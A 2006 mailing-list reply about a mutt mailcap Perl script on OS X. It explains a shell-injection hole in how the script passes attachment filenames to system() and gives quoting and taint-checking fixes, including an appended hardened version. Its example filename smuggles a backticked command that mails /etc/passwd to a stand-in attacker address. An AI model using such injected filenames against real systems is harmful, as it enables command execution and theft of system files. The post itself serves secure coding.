
Re: word and mutt mailcap (OSX)



On 2006-03-17 at 14:38 -0600, David Champion wrote:
>     ## Obtain basename and extension, so that we can preserve the extension.
>     $ARGV[0] =~ m!^(.*)\.([^.]+)$!;
>     my ($base, $ext) = ($1, $2);
> 
>     ## Make a link, not a copy.
>     link("$base.$ext", "$base.tmp.$ext");
> 
>     ## Open it asynchronously.
>     system("open '$base.tmp.$ext');

Aside from missing the trailing " to close the string, if the basename
is being provided from the MIME data then there's a potential security
hole in this construct.  What if $base contains a single-quote, to close
the quote you provided?

Original supplied filename:
  /dev/null'`Mail -s pw evil@xxxxxxxxxxx </etc/passwd`'.txt

If mutt cleans the data to be sure it's safe (I've forgotten), what
about other programs using mailcap?

The ideal fix involves not passing the value to the shell, using Perl's
-T taint checking and also being sure that the filename looks vaguely
sane.  The quick hack fix is worth knowing, though:

  my $fn = "$base.tmp.$ext";
  $fn =~ s/'/'"'"'/g;
  system("open '$fn'");

I.e., wherever there's a single-quote, replace it by ending the
single-quote sequence, use double-quotes to pass through a single-quote,
then restart the single-quote sequence.

-Phil
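
The "ideal fix" described in the message above (no shell, -T taint checking, and a filename sanity check), as an added example that is not part of the original post or of the script it quotes. The allowed character set, the PATH value, and the names split_sane_path and open_attachment are assumptions.

```perl
#!/usr/bin/perl -T
use strict;
use warnings;

# Taint mode will not run external commands with an inherited
# environment, so pin PATH and drop shell-related variables.
$ENV{PATH} = '/usr/bin:/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Split a path into (base, ext), returning untainted copies, or an
# empty list if it does not look sane. The allowed character set is
# an assumption; widen it only as far as real attachment names need.
sub split_sane_path {
    my ($path) = @_;
    return unless defined $path;
    return if $path =~ /\A-/;    # would be read as an option by open(1)
    my $c = qr/[A-Za-z0-9_.-]/;
    # Optional directories, then basename "." extension. No quotes,
    # backticks, whitespace or other shell metacharacters can match.
    return unless $path =~ m!\A((?:$c*/)*$c+)\.([A-Za-z0-9]+)\z!;
    return ($1, $2);             # regex captures are untainted
}

sub open_attachment {
    my ($path) = @_;
    my ($base, $ext) = split_sane_path($path)
        or die "refusing suspicious filename\n";
    my ($orig, $tmp) = ("$base.$ext", "$base.tmp.$ext");

    # Make a link, not a copy (as in the original script).
    link($orig, $tmp) or die "link $orig -> $tmp: $!\n";

    # List form: Perl execs "open" directly with $tmp as one argv
    # element, so no shell ever parses the filename.
    system('open', $tmp) == 0 or die "open failed: status $?\n";
    return $tmp;
}

open_attachment($ARGV[0]) if @ARGV;
```

With -T enabled, passing the raw $ARGV[0] to link() or system() aborts with an "Insecure dependency" error, so the sanity check cannot be skipped by accident.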